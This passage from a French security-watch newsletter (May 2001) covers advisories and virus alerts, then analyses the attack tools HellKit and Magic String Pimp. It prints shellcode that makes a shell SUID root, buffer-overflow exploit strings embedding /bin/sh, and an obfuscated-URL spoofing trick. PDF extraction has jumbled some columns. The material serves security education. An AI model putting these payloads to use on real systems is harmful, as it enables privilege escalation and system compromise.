sur Windows 2000 SP1 MS01-023 - Unchecked Buffer in ISAPI Extension Could Enable Compromise of IIS 5.0 Server MS01-014 - Malformed URL can Cause Service Failure in IIS 5.0 and Exchange 2000 MS01-016 - Malformed WebDAV Request Can Cause IIS to Exhaust CPU Resources 3. Correctifs pour ISS 4.0 et IIS 5.0 MS00-030 - Patch Available for "Malformed Extension Data in URL" Vulnerability MS00-078 - Patch Available for "Web Server Folder Traversal" Vulnerability MS00-086 - Patch Available for "Web Server File Request Parsing" Vulnerability MS00-023 - Patch Available for "Myriad Escaped Characters" Vulnerability MS00-031 - Patch Available for "Undelimited .HTR Request" & "File Fragment Reading via .HTR" Vulnerabilities MS00-044 - Patch Available for "Absent Directory Browser Argument" Vulnerability MS01-004 - Malformed .HTR Request Allows Reading of File Fragments MS00-060 - Patch Available for "IIS Cross-Site Scripting" Vulnerabilities MS00-084 - Patch Available for "Indexing Services Cross Site Scripting" Vulnerability MS00-100 - Patch Available for "Malformed Web Form Submission" Vulnerability MS00-019 - Patch Available for "Virtualized UNC Share" Vulnerability MS00-057 - Patch Available for "File Permission Canonicalization" Vulnerability MS00-080 - Patch Available for "Session ID Cookie Marking" Vulnerability La section 4. contient une liste d'URLs pointant sur les outils et checklist pour IIS. Ce bulletin est sans doute publié à la suite des récentes attaques qu'ont connus les systèmes sous IIS 4.0 ou 5.0. Ajoutons que l'alerte fait aussi état du bulletin MS01-026 même si celui-ci n'est pas recensé dans la liste. ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2001.02 Note d'information sur le virus 'Homepage' L'AusCERT publie, sous la référence AL-2001.09, un bulletin d'alerte au sujet du virus baptisé 'Homepage'. Il se présente sous la forme d'un script vbs et se propageant par e-mail. ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.09 AXENT/SYMANTEC Nouvelles règles de détection pour 'NetProwler 3.5x' Les nouvelles règles de détection pour 'NetProwler 3.5x SU4' permettent de notifier les agents 'Intruder Alert' via les trap SNMP. Cette fonctionnalité permet de contrôler à la fois 'NetProwler' et 'Intruder Alert' depuis une même machine centrale. http://www2.axent.com/swat/index.cfm?Doc=2001_04_27 CERT Note d'information sur l'outil de DDoS 'Carko' Le CERT publie, sous la référence IN-2001-04, un bulletin d'information au sujet de l'outil de déni de service distribué 'Carko'. Cette note sensibilise l'utilisateur en qualifiant de forts les risques encourus. Les liens vers les bulletins CA-2001-05 et VU#648304 y sont rappelés. Notons que Sun reste silencieux quant à la disponibilité de correctifs pour le démon 'snmpXdmid', dont la vulnérabilité est exploitée par 'Carko'. http://www.cert.org/incident_notes/IN-2001-04.html Publications des statistiques du CERT de 1988 à 2001 Le CERT publie les statistiques reflétant la croissance du nombre de vulnérabilités au niveau de la sécurité informatique. A titre d'exemple, le tableau des incidents reportés en révèle 21756 pour l'an 2000, 7047 pour le premier trimestre 2001, pour un total de 54,758 incidents sur les quatorze années que compte le CERT. http://www.cert.org/stats/cert_stats.html Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 37/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 CISCO Création d'une section d'informations sur la sécurité Cisco propose une nouvelle section intitulée 'Security Notices' ayant pour but d'informer les utilisateurs des problèmes de sécurité faisant l'objet de bulletins à venir. Cette section contient aussi les problèmes liés aux mauvaises configurations pouvant entraîner la compromission des systèmes. Les liens externes fournis pointent sur la description du problème ainsi que la réponse du service technique Cisco. http://www.cisco.com/warp/public/707/notices.html COMPAQ Disponibilité du kit 'ITSEC Certification' Compaq annonce la disponibilité du kit (sous forme de correctif) 'ITSEC Certification' pour Tru64 UNIX version 4.0G. Ce kit permet d'obtenir une version 'ITSEC' certifiée. Cette configuration est utilisée par les utilisateurs ayant besoin d'une réplique exacte des environnements sous lesquels la certification 'ITSEC E2' est nécessaire. http://ftp.support.compaq.com/patches/public/Readmes/unix/itsec_cert_kit_t64v40g_releasenotes.README ECommerce Publication des résultats d'une étude Française Les résultats d'une étude portant sur le niveau de sécurité théorique et pratique et menée sur 319 sites de commerces électroniques ont été publiés. Les résultats sont loin d'être positif puisqu'ils font apparaître une très faible utilisation du chiffrement SSL à 128 bits chez les professionnels dont les banques et courtiers en bourse. Notons cependant une confusion quelque peu gênante dans une étude portant sur un sujet aussi sérieux. Il semble notamment que le rôle du certificat serveur vis à vis des conditions d'établissement d'un session chiffrée (et donc son impact sur le choix de la longueur de clef) ne soit pas compris. Cette erreur conduit ainsi à devoir reconsidérer certaines conclusions de l'étude ! http://www.projetweb.com/labalise/securite/ HP Utilitaire de contrôle de l'application des correctifs HP annonce la disponibilité d'un utilitaire écrit en 'perl' et destiné à contrôler l'application des correctifs sur les plates-formes HP-UX 11.00, 11.04 et 11.11. 'Security Patch Check' nécessite de disposer d'une connectivité Internet afin de télécharger la dernière version de la liste des correctifs depuis le site HP. http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=B6834AA ISS Mise à jour de plusieurs produits ISS 'Database Scanner' XPU 1.1 Cette mise à jour permet la vérification de quatre vulnérabilités découvertes dans Microsoft SQL (débordement de buffer, exposition des noms et mots de passe, déni de service). http://www.iss.net/db_data/xpu/DB1.1.php 'Internet Scanner' XPU 4.9 Parmi les quatorze nouveaux test, cette mise à jour détecte les trames 802.11 erronées ainsi que les versions vulnérables du démon 'snmpXdmid'. http://www.iss.net/db_data/xpu/IS4.9.php 'RealSecure' XPU NS MU 2.3 Cette mise à jour détecte dix nouveaux types d'attaques de type déni de service, portes dérobées et autres. http://www.iss.net/db_data/xpu/RSNS%20MU%202.3.php http://www.iss.net/db_data/xpu/DB.php http://www.iss.net/db_data/xpu/IS.php http://www.iss.net/db_data/xpu/RS.php ISS/NetworkICE ISS acquiert Network ICE Internet Security Systems, fournisseur de solutions sécurisées pour l'Internet vient d'acquérir Network ICE, développeur d'applications d'intrusion et de détection. La transaction est estimée 195 millions de dollars, soit 4,3 millions de parts de la société ISS. http://www.net-security.org/text/press/988721849,18169,.shtml NIPC Recrudescence de balayage des ports 511 et 111 Le NIPC publie, sous la référence 01-010, un bulletin d'alerte informant les utilisateurs Unix et dérivés d'une activité importanTe de sondage des ports 515 et 111. Celle-ci serait un signe avant coureur d'attaques dirigées vers les services 'lpd/LPRng' et 'RPC'. http://www.nipc.gov/warnings/alerts/2001/01-010.htm Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 38/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 SANS SANS Emergency Incident Handler Le SANS propose depuis peu un nouveau site http://www.incidents.org/ qui a pour vocations d'informer, de protéger les utilisateurs des nouvelles attaques ou virus afin ce celui-ci puisse régir afin de les détecter. Ce site collecte aussi les adresses IP depuis lesquelles les attaques ont été menées. Ces informations sont fournies sous forme de tableau ou de graphique. http://www.incidents.org/ SYMANTEC/AXENT Protection contre le débordement de buffer sous IIS 5.0 Symantec propose aux utilisateur d'ESM (Enterprise Security Manager), un correctif afin de mettre à jour les fonctions de gestion de sécurité ESM. Il permet d'assurer la bonne gestion de la protection contre le débordement de buffer sous IIS 5.0 (ISAPI/IPP) relative au bulletin MS01-023. Une signature pour 'NetProwler' sera prochainement disponible. http://www2.axent.com/swat/index.cfm?Doc=2001_05_02 http://www2.axent.com/swat/ESM/mfw/patch.ps5 VIRUS Activité probable du virus 'Chernobyl' C'est aujourd'hui, 26 avril, date anniversaire du drame, que le virus 'Chernobyl' doit se réveiller. Ce virus destructif infecte et détruit les données du disque dur et du BIOS. Notons que la version 1.4 s'active chaque 26 du mois. Seuls Windows 95 et 98 sont affectés. http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_CIH Diffusion du vers 'Homepage' Dénommé 'HomePage' ou 'VBSWG.X', ce vers très médiatique a été créé à partir du générateur VBSWG ('VBS Worm Generator'), utilitaire analysé en détail dans notre rapport de veille N°32 (mois de Mars). Il est transmis par l'intermédiaire d'un courrier ayant pour sujet 'Homepage', contenant le message 'Hi! You've got to see this page! It's really cool ;O)' et l'attachement 'HOMEPAGE.HTML.VBS'. Localement, le code actif du vers modifie la page d'accueil du navigateur pour pointer vers l'un des quatre sites pornographiques prédéfinis et tente de se camoufler en détruisant tous les courriers ayant pour sujet 'Homepage'. Il se propage en utilisant le carnet d'adresse OutLook. http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_HOMEPAGE.A http://www.sophos.com/virusinfo/analyses/vbsvbswgx.html http://vil.nai.com/villib/dispvirus.asp?virus_k=99082 http://www-1.ibm.com/services/continuity/recover1.nsf/advisories/8525680F006B944585256A47003BF4FE/$file/sva004.txt Forte activité du vers 'sadmind/IIS' en France Nous avons eu confirmation de l'activité du vers 'sadmind/IIS' sur plusieurs sites Français dés Lundi 7 Mai. Nous rappelons en conséquence l'urgence de contrôler la présence des correctifs nécessaires (avis CERT CA-2001.11) sur les systèmes Solaris Version <= 2.7 et les serveurs IIS 4.0 et 5.0. http://www.cert.org/current/current_activity.html#sadmind-IIS http://www.sophos.com/virusinfo/analyses/unixsadmind.html http://vil.nai.com/villib/dispvirus.asp?virus_k=99085 ATTAQUES OUTILS HELLKIT ! # Description L'exploitation d'une vulnérabilité de type 'débordement de buffer' nécessite l'écriture de deux programmes: un programme destiné à s'exécuter sur le système cible et dénommé ShellCode probablement en référence à l'activation quasi systématique d'un interpréteur de commande ou shell, un programme d'interface destiné à transférer le code binaire du ShellCode sous la forme d'une chaîne de caractère spécialement formatée. Si l'écriture d'un programme d'interface portable ne pose que peu de problèmes, il en va tout autrement lorsqu'il s'agit d'écrire le ShellCode. Cette opération est suffisamment complexe pour conduire de nombreux pirates à réutiliser un code existant sans autre modification que le numéro de port TCP sur lequel sera activé l'interpréteur de commande. Bien qu'aucune statistique ne soit disponible dans ce domaine, l'expérience permet de considérer que les ShellCodes actuellement utilisés en environnement LINUX dérivent tout au plus d'une dizaine de souches. La difficulté rencontrée provient de la combinaison des contraintes induites à deux niveaux: 1. le contexte d'exécution sur la cible: le code binaire doit non seulement être le plus concis possible afin de pouvoir être exploité sur des buffers de faible taille mais il doit aussi respecter les spécificités du système d'exploitation utilisé sur la cible. Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 39/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 2. les conditions de transfert du code: le code binaire doit pouvoir être substitué aux données attendues par l'application. Il doit en conséquence respecter un format généralement contraignant car interdisant l'utilisation de nombreux caractères: caractères de contrôles, caractère 'NULL' voire caractères non imprimables. L'auteur devra donc soigneusement sélectionner les instructions utilisées en rejetant toute instruction dont code binaire après assemblage contiendra l'un des caractères non autorisés ! L'écriture d'un ShellCode est pourtant notablement facilitée par la diffusion de 'HellKit', un paquetage largement diffusé écrit en Mars 2000 par un programmeur affilié au groupe TESO, association de 'jeunes programmeurs enthousiastes' à l'origine de nombreux codes dont le vers Adore. HellKit est livré sous forme de sources produisant, après compilation, trois exécutables dont en pratique seul l'exécutable driver' sera directement utilisé. Le principe de fonctionnement est simple et efficace: l'utilisateur écrit un ShellCode en langage C en se restreignant aux seules fonctions externes supportées. Ce source est ensuite analysé, compilé et optimisé par l'utilitaire 'driver'. Il est à noter que la technique de mise au format employée pour éliminer certains symboles présents dans le code binaire natif conduit à encoder les chaînes de caractères rendant ainsi plus difficile la détection du shellcode par les mécanismes d'analyse de signature classiques basés sur la recherche de chaînes spécifiques telle la chaîne '/bin/sh'. La librairie fournie avec HellKit ne comporte pas moins de 12 appels systèmes pré encodés: 1. Positionnement dans un répertoire 3. Gestion des processus - chdir(char *path) - execve(char *s, char **argv, char **envp) 2. Manipulation de fichier - fork(void) - dup(int fd) et dup2(int ofd, int nfd) 4. Gestion des droits - setreuid(int reuid, int euid) - open(char *path, int mode, int flags) - chown(char *path, int uid, int gid) - read(int fd, void *buf, long count) - chmod(char *path, int mode) - write(int fd, void *buf, long count) - chroot(char *path) - close(int fd) A titre d'exemple, le code (simpliste) suivant écrit en langage 'C' peut être rapidement transformé en un 'ShellCode' de moins de 111 octets au moyen de la simple commande: ./driver code.c % Fichier 'code.c' #include "../../lib/int80.h" // Fichier de définition des appels int main() { char *sh = "mysh"; // Chemin d'accès à un interpréteur de commande chown (sh, 0, 0); // Le propriétaire et le groupe deviennent 'root' chmod (sh, 06755); // Positionnement des autorisations SUID et SGID } % Fichier 'shellcode.c' résultant /*** Generated by Stealth's hellkit v1.2 *** Don't edit! ***/ unsigned char hell[] = // Définition d'une variable contenant le code "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff" // machine binaire donc assemblé de la fonction "\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x01" // main définie dans le fichier 'code.c' "\x46\xe2\xfa\xea\x04\x6c\x78\x72\x69\x01" "\x80\xed\x66\x2a\x01\x01\x8c\x77\x01\x54" "\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a" "\x80\xc2\xaf\x11\x01\x01\x8c\xb2\x3b\xee" "\xfe\xfe\xb9\xb7\x01\x01\x01\x30\xc8\x30" "\xd3\x52\x88\xf2\xcc\x81\xb9\x0e\x01\x01" "\x01\xb8\xec\x0c\x01\x01\x52\x88\xf2\xcc" "\x81\x8c\x64\xf9\x5a\x5f\xc8\xc2\x91\x91" "\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91" "\x91"; int main() // Fonction permettant de tester le bon { // fonctionnement du code binaire. // Son exécution provoque l'affichage de la int (*f)(); // longueur du code et l'exécution de celui-ci f = hell; // Ici les propriétés du fichier mysh sont printf("%d\n", strlen(hell)); // modifiée: f(); // rwsr-sr-x root root mysh } Une technique alternative plus souvent utilisée consiste à exploiter les services d'un interpréteur de commande. Le code précédent peut ainsi être écrit sous la forme de la commande shell équivalente '/bin/sh -c chmod 6755 mysh'. Le code généré atteint alors 143 octets mais reste indétectable, les chaînes caractéristiques '/bin/sh' et 'chmod' étant encodées. Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 40/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 % % Commande 'équivalente' #include "../../lib/int80.h" #define NULL (void*)0 int main() { char *a[]= {"/bin/sh","-c","chmod 6777 mysh", NULL}; execve(*a, a, NULL); return 0; } Fichier 'shellcode.c' résultant /*** Generated by Stealth's hellkit v1.2 *** Don't edit! ***/ unsigned char hell[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff" "\x83\xc6\x0d\x31\xc9\xb1\x78\x80\x36\x01" "\x46\xe2\xfa\xea\x1a\x2e\x63\x68\x6f\x2e" "\x72\x69\x01\x2c\x62\x01\x62\x69\x6c\x6e" "\x65\x21\x37\x36\x36\x36\x21\x6c\x78\x72" "\x69\x01\x80\xed\x66\x2a\x01\x01\x91\x54" "\x88\xe4\x82\xed\x11\x52\xe9\x01\x01\x01" "\x01\x5a\x80\xc2\xb9\x11\x01\x01\x8c\x92" "\x1b\xee\xfe\xfe\x88\x54\xf1\x8c\x82\x23" "\xee\xfe\xfe\x88\x44\xf5\x8c\x82\x24\xee" "\xfe\xfe\x88\x44\xf9\xc6\x44\xfd\x01\x01" "\x01\x01\x6b\x01\x8c\x44\xf1\x51\x53\xe9" "\xba\xff\xfe\xfe\x30\xc1\x8a\x5c\xed\xc8" "\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91" "\x91\x91\x91"; int main() { int (*f)(); f = hell; printf("%d\n", strlen(hell)); f(); } // Fichier de définition des appels // Définition de la commande à exécuter // via l'interpréteur de commande /bin/sh // Exécution de la commande // Définition d'une variable contenant le code // machine binaire donc assemblé de la fonction // main définie dans le fichier source // // // // // // // Fonction permettant de tester le bon fonctionnement du code binaire. Son exécution provoque l'affichage de la longueur du code et l'exécution de celui-ci Ici les propriétés du fichier mysh sont modifiée: rwsr-sr-x root root /bin/sh # Complément d’information http://teso.scene.at/releases/hellkit-1.2.tar.gz MAGIC STRING PIMP ! # Description L'utilitaire 'Magic String Pimp' ou 'MSP', écrit en langage C, est décrit par son auteur comme étant un générateur de chaînes de caractères permettant d'exploiter un débordement de buffer: Magic String Pimp is a command line tool that allows you to create Magic buffer overflow strings in various ways. It is mainly meant as a tool for Proof Of Concept exploit coders. And takes away the tedious task of writing exploits just to prove simple overflows exploitable Non seulement cet outil génère une chaîne de caractères permettant d'exploiter localement un débordement de buffer localisé dans une quelconque application fonctionnant en environnement LINUX x86 mais il autorise aussi l'activation locale de l'attaque lorsque certaines options sont correctement positionnées. Comme cela est souvent le cas avec les outils d'attaque 'underground', la documentation fournie reste très discrète sur le mode de fonctionnement exact de l'outil. Le recours à une analyse détaillée du code source permettra alors de comprendre les principes mis en œuvre mais aussi de contrôler l'innocuité de l'outil, à savoir l'absence de fonctionnalités dissimulées. 'MSP' propose trois modèles de ShellCode actuellement codés en dur mais devant être regroupés à terme dans une librairie indépendante: - Le modèle type 1 (47 octets de code) retourne un bourne shell (/bin/sh) ouvert sous l'autorité de l'application attaquée, - Le modèle type 2 (49 octets de code) retourne un shell mininal (/bin/sash) disposant des privilèges de l'application attaquée, - Le modèle type 3 (139 octets de code) positionne le bit SUID 'root' sur le fichier /tmp/own préalablement créé par 'MSP'. Le modèle de code ainsi sélectionné est modifié pour tenir compte des paramètres d'utilisation (taille du buffer cible, position estimée du pointeur de pile, …) puis formaté pour tenir compte du contexte d'activation. Ainsi, 'MSP' est à même de générer une chaîne d'exploitation conforme à l'un des trois contextes d'activation couramment rencontrés: 1. Débordement d'un buffer de grande taille (>400 octets) Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 41/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Dans un tel contexte, la localisation exacte dans la pile de l'adresse de retour de la fonction ayant déclaré le tampon est difficilement prédictible. Un assemblage classique conforme au modèle NOP - SHELLCODE - RET est alors privilégié. Le remplissage partiel du tampon est effectué avec une instruction nulle la plus courte possible, à savoir l'instruction NOP dont le code n'occupe qu'un octet dans les exemples présentés en suivant). Le (symbole code d'exploitation (le ShellCode) est ensuite écrit suivi d'une répétition de l'adresse de branchement (4 octets) sur ce code. En cas d'erreur sur l'estimation de la taille du tampon ou de l'adresse de retour, le branchement sera effectué sur la zone de garde constituée des NOP. Pile buffer myfunction(char * value) { char buffer[256]; int var; ... strcpy(tampon,value); ... return; } ShellCode ‘return’ © APOGEE Communications Pile 2. Débordement d'un buffer de faible taille (< 400 octets) La logique précédemment utilisée ne permet plus de myfunction(char * value) { garantir le positionnement correct du ShellCode dans la char buffer[256]; int var; pile, celui-ci risquant d'écraser la zone contenant l'adresse ... strcpy(tampon,value); de retour de la fonction appelante. Un nouveau modèle ... buffer return; d'assemblage doit alors être utilisé: RET - NOP } SHELLCODE. Il est ainsi préférable de remplir le tampon avec l'adresse ‘return’ estimée de branchement sur le ShellCode en débordant largement. La zone de garde constituée de NOP est ensuite écrite suivie du ShellCode. Ici encore, en cas d'erreur de ShellCode positionnement, le branchement sera effectué quelque part © APOGEE Communications dans la zone de garde. Pile 3. Ecrasement d'une variable d'environnement Cette technique alternative peut être utilisée lorsque la myfunction(char * value) { trop faible taille du buffer cible n'autorise pas le placement char buffer[256]; int var; d'un ShellCode ou bien quand l'exécution des données en ... buffer strcpy(tampon,value); pile n'est pas autorisée. ... return; Le ShellCode est alors placé dans une zone mémoire } ‘return’ située en dehors de la pile courante du processus attaqué, en l'occurrence, dans une variable d'environnement créé à cet effet par l'utilitaire 'MSP'. ENV Le buffer est alors simplement écrasé par plusieurs copies de l'adresse de cette variable d'environnement (4 octets). Trois variations de cette technique sont proposée par ShellCode © APOGEE Communications 'MSP'. Un exemple concret présentant chacune des chaînes de caractères susceptibles d'être générées par MSP est proposé ci après, les différentes structures étant mises en évidence par la couleur de fond: Buffer > 400 octets ./msp -s 300 -T 1 -S -t 1 Buffer < 400 octets ./msp -s 300 -T 1 -S -t 2 ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõ ÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõ ÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõ ÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõ ÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ ë^__~Iüf÷Ô1À~J^GGW®uý~Hg ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõ ÿHuö[SPZ~Iá°^KÍ~@èÜÿÿÿ^A/bin/sh^A¿D÷ ÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿ Variables d'environnement ./msp -s 300 -T 1 -S -t 3 DUN= ë^__ ~Iüf÷Ô1À~J^GGW®uý~HgÿHuö[SPZ~Iá°^KÍ~@è Üÿÿÿ^A/bin/sh^A RET=^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^P õÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿ ^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põ ÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^ Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^P õÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿ @ë^__~Iüf÷Ô1À~J^GGW®uý~ ^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põ HgÿHuö[SPZ~Iá°^KÍ~@èÜÿÿÿ^A/bin/sh^A ÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^ Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^P õÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿ ^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põ ÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^ Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^P õÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿ ^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põ ÿ¿^Põÿ¿^Põÿ¿^õÿ¿^Põÿ¿^Põÿ¿ Il est amusant de constater que MSP contient lui même un débordement de buffer (combinaison particulière des Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 42/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 options -t et -s (ie: -t 1 -s 200) ! Nul n'est à l'abri d'une erreur de codage … Les lecteurs désireux d'en savoir plus sur ces trois techniques d'exploitation d'un débordement de buffer pourront se reporter avec profit au document de référence 'Smashing the stack for Fun and Profit' publié en Novembre 1996 par aleph1 dans le numéro 49 de Phrack Magazine. # Complément d’information http://www.phrack.com/search.phtml?view&article=p49-14 http://orbita.starmedia.com/~dizznutt/code/msp-0.01.tar.gz (page non accessible à la date de publication) TECHNIQUES MANIPULATION D’URL # Description Il est assez courant de rencontrer une adresse de sites WEB utilisant une forme exotique et difficilement interprétable car constituée d’une succession de symboles et caractères numériques. L’utilisateur non averti aura ainsi quelques difficultés à déterminer sur quoi pointe l’URL http://3254959035/%69%6e%64%65%78%2e%68%74%6d sauf à tester celle-ci avec les risques que cela peut comporter ! L’utilisation d’adresses difficilement interprétables n’est pas un phénomène anodin mais bien le résultat d’une volonté délibérée d’induire en erreur les mécanismes d’analyse qu’il s’agisse de ceux d’un être humain, l’utilisateur, ou de ceux implémentés dans les équipements, notamment les dispositifs de filtrage. La BBC a ainsi dernièrement fait l’objet d’une attaque destinée à atteindre à son image de marque via la publication sur son site d’information d’une nouvelle erronée concernant la mort d’une pop star. Début Mai, quelques grands médias ont ainsi pu titrer à la ‘Une’ «BBC announces death of pop star» ou encore «BBC falls down server hole» mettant dans l’embarras la direction de la BBC. Jusque là rien de plus ‘banal’ d’autant que quelques jours auparavant, et pour la première fois, un site WEB d’information de la BBC a fait l’objet d’un vitriolage en règle de la part d’un groupe d’activistes (une copie de la page WEB manipulée est disponible sur le site d’Attrition) ajoutant à la confusion. En effet, la publication de la fausse nouvelle sur le site de la BBC a pu être effectuée sans aucune manipulation ou modification du site original ! La technique utilisée ? ….. Une adresse WEB utilisant une syntaxe induisant en erreur une écrasante majorité d’utilisateurs ! Ainsi, l’adresse de site http://news.bbc.co.uk!articles@3254959035/%69%6e%64%65%78%2e%68%74%6d ne pointe pas une page du site de la BBC mais tout simplement la page d’accueil du serveur d’APOGEE Communications ! Cette technique est tellement efficace qu’un rappel des principes de construction et d’analyse des adresses WEB semble indispensable. A ce jour, les références actuellement applicables en matière de composition et d’interprétation d’une adresse WEB sont : - D’une part, le RFC1630 publié en Juin 94 et intitulé ‘URI’s in WWW’, qui spécifie non seulement la syntaxe d’une URL sous la forme d’une grammaire BNF mais aussi chacun des schémas d’accès normalisés, - D’autre part, le RFC2396 intitulé ‘Uniform Resource Identifier (URI) : Generic Syntax‘ et publié en Août 98 dont l’objectif est de fournir une spécification générique applicable à tout identifiant de ressources. Ce document, qui résulte de la fusion des RFC1736 et RFC1737, propose une syntaxe compatible avec celle définie dans le cadre plus restreint des services Web par le RFC 1630. Une lecture attentive de ces deux documents de références est nécessaire pour déterminer avec précision le domaine de validité d’une syntaxe particulière, et plus précisément, la logique d’analyse conduisant à déterminer sa portée. Attention toutefois, la logique spécifiée dans un standard de type RFC peut ne pas être totalement respectée par un produit libre ou commercial. De nombreux exemples viennent prouver les libertés d’interprétations prises par certains éditeurs dans ce domaine: traitement des balises étendues HTML par les deux navigateurs les plus connus, gestion des mécanismes d’authentification HTTP, … Le RFC2396 défini ainsi une URI (Uniform Resource Identifier) comme étant une chaîne de caractères permettant d’identifier une ressource abstraite ou physique. Cette définition englobe deux éléments plus concrets : - l’URL (Uniform Resource Locator) permettant d’identifier une ressource par une description du moyen d’accès, la localisation dans le réseau, - l’URN (Uniform Resource Name) dont l’objet premier est le nommage d’une ressource par le biais d’un identifiant persistant. Toute URI, et par conséquent, toute URL ou URN, est exprimée la forme d’une chaîne constituée de 4 composantes : <scheme> :// <authority> <path> ? <query> Dans le cas plus précis d’une URL, la signification de ces composantes est la suivante : # La méthode (scheme) : cette composante permet d’identifier la méthode d’accès, c’est-à-dire, le plus souvent le protocole devant être utilisé. Actuellement, le RFC1630 spécifie 12 méthodes d’accès élémentaires (http, ftp, gopher, mailto, afs, news, telnet, rlogin, tn3270, wais, file, mid et cid) dont deux (mid, cid) semblent ne pas avoir été implémentées. D’autres méthodes sont détaillées dont celle décrite (ldap) dans le RFC2255 permettant l’accès aux services LDAP. # L’autorité (authority) : cette composante contient l’ensemble des informations nécessaires à la localisation de la ressource. En pratique, il s’agit de l’ensemble des éléments requis pour ouvrir et établir le protocole associé à la Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 43/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 méthode d’accès. La syntaxe spécifiée par le RFC2396 rationalise celle initialement décrite RFC1630 en instituant une syntaxe générique de la forme ‘[userinfo@]host[:port]’, userinfo pouvant contenir n’importe quel caractère non réservé et notamment les caractères 